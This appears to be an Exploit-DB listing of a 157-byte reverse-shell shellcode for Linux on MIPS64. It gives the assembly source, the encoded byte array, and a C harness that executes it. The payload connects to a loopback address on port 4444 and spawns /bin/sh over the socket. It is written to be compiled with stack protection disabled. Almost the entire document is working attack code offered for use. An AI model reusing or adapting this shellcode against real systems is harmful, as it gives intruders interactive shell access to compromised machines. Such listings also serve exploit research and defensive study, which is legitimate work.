Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)

EDB-ID:

47296

CVE:

N/A




Platform:

Linux

Date:

2019-08-20


/*
 *    # Reverse shell shellcode for Linux MIPS64 (mips64el)
 *    # Default port: tcp/4444
 *    # Host: localhost
 *    # Date: August 19 - 2019	
 *    # Author: Antonio de la Piedra
 *    # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta 
 *    # Size: 157 bytes
 *    # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
 */

#include <stdio.h>
#include <string.h>

/*
.text
        .global __start
__start:

        dli $s4, -3
        dli $s5, -17
        nor $a0,$s4,$zero
        nor $a1,$s4,$zero
        slti    $a2,$zero,-1
        li      $v0,5040 
        syscall 0x40404

        sw   $v0, -32($sp) 
        lw $a0, -32($sp)

        nor $t0,$s4,$zero 
        sw $t0, -12($sp)
        dli     $t2,0x5c11 
        sw      $t2,-10($sp)
        dli     $t1,0x0101017f 
        sw      $t1,-8($sp)
        daddiu  $a1,$sp,-12
        nor $a2,$s5,$zero
        dli     $v0,5041 
        syscall 0x40404

        nor $a1,$s4,$zero
        dli     $s0, -1
loop:
        dli     $v0,5032
        syscall 0x40404
        daddi   $a1,$a1,-1
        bne     $a1,$s0,loop
        dli     $t0,0x69622f2f 
        sw      $t0,-12($sp)
        dli     $t1,0x68732f6e
        dli     $t1,0x68732f6e
        sw      $t1,-8($sp)
        sw      $zero,-4($sp)
        daddiu $a0,$sp,-12
        slti    $a1,$zero,-1   
        slti    $a2,$zero,-1
        dli     $v0,5057
        syscall 0x40404
.align 8
*/

unsigned char code[] = 
      "\xfd\xff\x14\x24"
      "\xfd\xff\x14\x24"
      "\xef\xff\x15\x24"
      "\x27\x20\x80\x02"
      "\x27\x28\x80\x02"
      "\xff\xff\x06\x28"
      "\xb0\x13\x02\x24"
      "\x0c\x01\x01\x01"
      "\xe0\xff\xa2\xaf"
      "\xe0\xff\xa4\x8f"
      "\x27\x60\x80\x02"
      "\xf4\xff\xac\xaf"
      "\x11\x5c\x0e\x24"
      "\xf6\xff\xae\xaf"
      "\x01\x01\x0d\x3c"
      "\x7f\x01\xad\x35"
      "\xf8\xff\xad\xaf"
      "\xf4\xff\xa5\x67"
      "\x27\x30\xa0\x02"
      "\xb1\x13\x02\x24"
      "\x0c\x01\x01\x01"
      "\x27\x28\x80\x02"
      "\xff\xff\x10\x24"
      "\xa8\x13\x02\x24"
      "\x0c\x01\x01\x01"
      "\xff\xff\xa5\x60"
      "\xfc\xff\xb0\x14"
      "\x62\x69\x0c\x3c"
      "\x2f\x2f\x8c\x35"
      "\xf4\xff\xac\xaf"
      "\x73\x68\x0d\x3c"
      "\x6e\x2f\xad\x35"
      "\xf8\xff\xad\xaf"
      "\xfc\xff\xa0\xaf"
      "\xf4\xff\xa4\x67"
      "\xff\xff\x05\x28"
      "\xff\xff\x06\x28"
      "\xc1\x13\x02\x24"
      "\x0c\x01\x01\x01";

int main(int argc, char ** argv)
{
        void(*s)(void);

        printf("Shellcode Length:  %d\n", strlen(code));

        s = code;
        s();

}